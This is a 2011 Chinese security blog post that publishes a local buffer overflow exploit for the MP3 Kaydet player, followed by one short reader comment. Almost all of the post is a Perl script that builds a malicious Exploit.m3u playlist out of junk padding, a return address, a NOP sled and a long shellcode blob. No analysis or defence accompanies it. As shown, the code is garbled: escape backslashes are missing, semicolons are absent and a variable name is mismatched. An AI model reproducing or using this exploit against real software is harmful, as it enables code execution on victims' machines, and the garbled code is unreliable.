MP3 Kaydet本地缓冲区溢出

my $file= "Exploit.m3u";
my $junk= "x41" x 1600;
my $ret= "xEBx5Dx3Ex5F"
my $nop ="x90" x 20
my $shellcode =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x9a".
"xb8xbbx46x83xebxfcxe2xf4x66xd2x50x0bx72x41x44xb9".
"x65xd8x30x2axbex9cx30x03xa6x33xc7x43xe2xb9x54xcd".
"xd5xa0x30x19xbaxb9x50x0fx11x8cx30x47x74x89x7bxdf".
"x36x3cx7bx32x9dx79x71x4bx9bx7ax50xb2xa1xecx9fx6e".
"xefx5dx30x19xbexb9x50x20x11xb4xf0xcdxc5xa4xbaxad".
"x99x94x30xcfxf6x9cxa7x27x59x89x60x22x11xfbx8bxcd".
"xdaxb4x30x36x86x15x30x06x92xe6xd3xc8xd4xb6x57x16".
"x65x6exddx15xfcxd0x88x74xf2xcfxc8x74xc5xecx44x96".
"xf2x73x56xbaxa1xe8x44x90xc5x31x5ex20x1bx55xb3x44".
"xcfxd2xb9xb9x4axd0x62x4fx6fx15xecxb9x4cxebxe8x15".
"xc9xebxf8x15xd9xebx44x96xfcxd0xaax1axfcxebx32xa7".
"x0fxd0x1fx5cxeax7fxecxb9x4cxd2xabx17xcfx47x6bx2e".
"x3ex15x95xafxcdx47x6dx15xcfx47x6bx2ex7fxf1x3dx0f".
"xcdx47x6dx16xcexecxeexb9x4ax2bxd3xa1xe3x7exc2x11".
"x65x6exeexb9x4axdexd1x22xfcxd0xd8x2bx13x5dxd1x16".
"xc3x91x77xcfx7dxd2xffxcfx78x89x7bxb5x30x46xf9x6b".
"x64xfax97xd5x17xc2x83xedx31x13xd3x34x64x0bxadxb9".
"xefxfcx44x90xc1xefxe9x17xcbxe9xd1x47xcbxe9xeex17".
"x65x68xd3xebx43xbdx75x15x65x6exd1xb9x65x8fx44x96".
"x11xefx47xc5x5exdcx44x90xc8x47x6bx2ex6ax32xbfx19".
"xc9x47x6dxb9x4axb8xbbx46";
open($File,">$file");
print $File $Junk.$ret.$nop.$shellcode;
close($File);

本文固定链接: https://www.unhonker.com/bug/167.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年09月01日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: MP3 Kaydet本地缓冲区溢出 | 90' s Blog|关注网络信息安全
【上一篇】
【下一篇】

MP3 Kaydet本地缓冲区溢出:目前有1 条留言

  1. 沙发
    老虎:

    08 老虎 来过了

    2011-09-03 16:51

发表评论

您必须 [ 登录 ] 才能发表留言!